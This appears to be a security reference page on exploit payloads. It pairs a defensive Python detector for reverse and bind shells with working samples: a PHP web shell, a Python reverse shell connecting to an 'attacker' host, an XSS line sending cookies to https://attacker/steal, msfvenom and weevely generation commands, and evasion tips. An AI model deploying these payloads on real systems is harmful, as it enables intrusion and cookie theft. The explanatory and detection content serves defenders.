Exploit Payload

An exploit payload is the code or data an exploit delivers once it has gained control, chosen to achieve the attacker's objective: spawning a shell, establishing a backdoor, or exfiltrating data.

Payload Types

Staged vs Stageless

# Stageless: the complete payload arrives in a single delivery
# Larger in size, but needs only one request and no follow-up connection

# Staged: a small loader (stage 1) fetches the main payload (stage 2)
# Stage 1: connect back to the attacker, download stage 2
# Stage 2: full functionality (Meterpreter, shell)

Common Payload Goals

  • Reverse shell: Connect back to attacker
  • Bind shell: Open port on victim
  • Meterpreter: Advanced post-exploitation
  • Command execution: Run specific commands
  • File download: Retrieve data
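A host-side check for the two shell goals above, written as an added example for this page (it is not code from the page's author or from any tool named here). It works over a constructed process snapshot in a hypothetical dict format (pid, command name, parent command name, user, and an fd table of the kind /proc/<pid>/fd exposes). A reverse shell and a bind shell look the same at this level: a shell or scripting interpreter whose stdin/stdout/stderr are wired to a socket rather than a terminal or pipe. A shell spawned directly by a web server worker is flagged separately, since that is how a command-execution web shell shows up.

```python
# Added example: detect reverse/bind shells from a process snapshot.
# The snapshot format and the field names are assumptions for this example;
# an EDR or a /proc walker would supply the same information.

SHELLS = {"sh", "bash", "dash", "zsh", "ash"}
INTERPRETERS = {"python", "python3", "perl", "ruby", "php"}
WEB_WORKERS = {"php-fpm", "apache2", "httpd", "nginx"}


def classify_process(proc):
    """Return a list of reason tags for one process record (empty if benign)."""
    reasons = []
    comm = proc["comm"]
    if comm in SHELLS or comm in INTERPRETERS:
        # fd 0/1/2 on a socket: stdio is a network connection.
        # Reverse shells (connect-back) and bind shells (accepted connection)
        # both end up here once the shell is wired to the socket.
        stdio = [proc["fds"].get(str(fd), "") for fd in range(3)]
        if any(target.startswith("socket:") for target in stdio):
            reasons.append("shell_stdio_on_socket")
    if comm in SHELLS and proc.get("parent_comm") in WEB_WORKERS:
        # A web server worker normally has no reason to launch a shell;
        # system($_GET['cmd'])-style web shells produce exactly this lineage.
        reasons.append("shell_spawned_by_web_worker")
    return reasons


def find_suspicious(snapshot):
    """Map pid -> reasons for every process in the snapshot that trips a rule."""
    return {p["pid"]: r for p in snapshot if (r := classify_process(p))}


# Constructed sample snapshot (not captured from a real host).
SNAPSHOT = [
    {"pid": 1201, "comm": "php-fpm", "parent_comm": "systemd", "user": "www-data",
     "fds": {"0": "/dev/null", "1": "/dev/null", "2": "/dev/null", "4": "socket:[50001]"}},
    # Shell launched by the web worker with stdio on pipes (command execution).
    {"pid": 1340, "comm": "sh", "parent_comm": "php-fpm", "user": "www-data",
     "fds": {"0": "pipe:[60010]", "1": "pipe:[60011]", "2": "/dev/null"}},
    # Shell whose stdio is a socket (reverse or bind shell).
    {"pid": 1355, "comm": "sh", "parent_comm": "python3", "user": "www-data",
     "fds": {"0": "socket:[61234]", "1": "socket:[61234]", "2": "socket:[61234]"}},
    # Administrator's SSH session: shell on a pty, spawned by sshd.
    {"pid": 2001, "comm": "bash", "parent_comm": "sshd", "user": "alice",
     "fds": {"0": "/dev/pts/0", "1": "/dev/pts/0", "2": "/dev/pts/0"}},
]

if __name__ == "__main__":
    for pid, reasons in find_suspicious(SNAPSHOT).items():
        print(pid, ", ".join(reasons))
```

The pipe-backed shell under php-fpm is reported as well because the web shell on this page runs its commands exactly that way; whether that is an incident or a known maintenance script is an allowlisting decision for the environment, not something the rule can settle.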

Web Payload Examples

# PHP web shell
<?php system($_GET['cmd']); ?>

# Python reverse shell
import socket,subprocess,os
s=socket.socket()
s.connect(("attacker",4444))
os.dup2(s.fileno(),0)
subprocess.call(["/bin/sh","-i"])

# JavaScript XSS payload
<script>
fetch('https://attacker/steal?c='+document.cookie)
</script>

Payload Generation

# Metasploit msfvenom
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf

# Web shells
weevely generate password shell.php

Evasion Considerations

  • Encoding to bypass filters
  • Obfuscation against detection
  • Custom payloads to avoid signatures
  • Encrypted communications

See Also